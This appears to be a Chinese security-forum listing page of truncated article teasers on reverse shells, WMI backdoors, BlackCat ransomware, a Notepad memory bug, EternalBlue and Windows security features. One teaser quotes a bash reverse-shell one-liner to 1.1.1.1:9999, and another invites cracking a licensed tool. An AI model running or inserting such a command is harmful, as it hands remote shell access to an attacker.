本文为看雪论坛优秀文章看雪论坛作者ID:方向感1、 准备win10、lumen windows安装包、PostgreSQL 10安装包、IDA 7.x。lumen windows安装包:到htt...
常用反弹shell方法总结
0x01 bash反弹shellbash -i >&/dev/tcp/1.1.1.1/9999 0>&1解释:bash -i [interface] 表示启动sh...
WMI后门技术的攻击与检测
0x01 WMI初认识1.1 WMI简介WMI是从Windows 2000起,在每个Windows系统版本中都会内置的一个管理框架。该框架由一组强大的工具集合组成,用于管理本地或远程的 Wi...
《入侵生命周期细分实践指南系列》:路径劫持攻击
美创科技为了更好地进行入侵检测和防御,参照各种安全威胁框架和自身的实践与思考,提出了基于入侵生命周期的攻击管理模型,作为美创新一代安全架构的三大支柱之一。入侵生命周期v1.0把入侵过程划分为7个阶段:...
Kaspersky:BlackCat技术分析
2021 年 12 月初,一个新的RaaS团伙出现,他们自称 ALPHV,也被称为 BlackCat。与其它勒索软件的最大区别之一是, BlackCat用 Rust 编写,这是不常见的,且...
Hex-Rays Decompilers (x64) and IDA Demo 7.4.191125 for Windows
功能评估版本,单x64 f5插件,跟之前破了大半年密码的7.2一样.限制有功能限制, 有兴趣可以自己动手crack。1.仅支持PE/ELF/Mach-O文件.2.无IDAPython.3.有时间限制....
研究人员利用微软的记事本打开远程shell访问
Google Project Zero研究人员发现了微软记事本Windows应用程序中的一个错误。Microsoft Windows记事本应用程序中的内存损坏错误可用于打开远程shell访问 - 通常...
永恒之蓝已平息?工控系统仍面临重大威胁
“永恒之蓝”勒索蠕虫全球攻击事件渐渐平息,此次蠕虫攻击主要波及互联网、企业内网和机构专网,尚没有工业控制系统遭遇攻击的事件发生,但这并非意味着工业控制系统可以高枕无忧,在类似“永恒之蓝”这样的安全威胁...
让登录更安全 开启Windows10组合键解锁屏幕
Windows 10锁屏状态下,默认通过敲击键盘按键或者鼠标按键就可以进入登录界面。然而这可能会给部分别有用心的人可乘之机,进入登录页面后就可以进行密码破解,甚至在没有密码的情况下直接进入系统。因此,...
Windows 11新版本中的安全加密新特征
微软公开Windows 11新版本中的安全和加密新特征。微软称在新发布的Windows 11系统版本中将加入更多的安全改进,其中包括对网络安全威胁的保护、提供更好的加密、以及拦截恶意APP和驱动。微软...
CNNVD | 关于微软多个安全漏洞的通报
扫码订阅《中国信息安全》杂志权威刊物 重要平台 关键渠道邮发代号 2-786近日,微软官方发布了多个安全漏洞的公告,其中微软产品本身漏洞109个,影响到微软产品的其他厂商漏洞2个。包括Microsof...
内网安全 | Windows必学基础回顾
文章来源|MS08067 红队培训班 第6期本文作者:tIn7erface(红队培训班讲师)拓扑一、Tools:掌握impacket工具包:使用--原理--编写 == 大成http...
169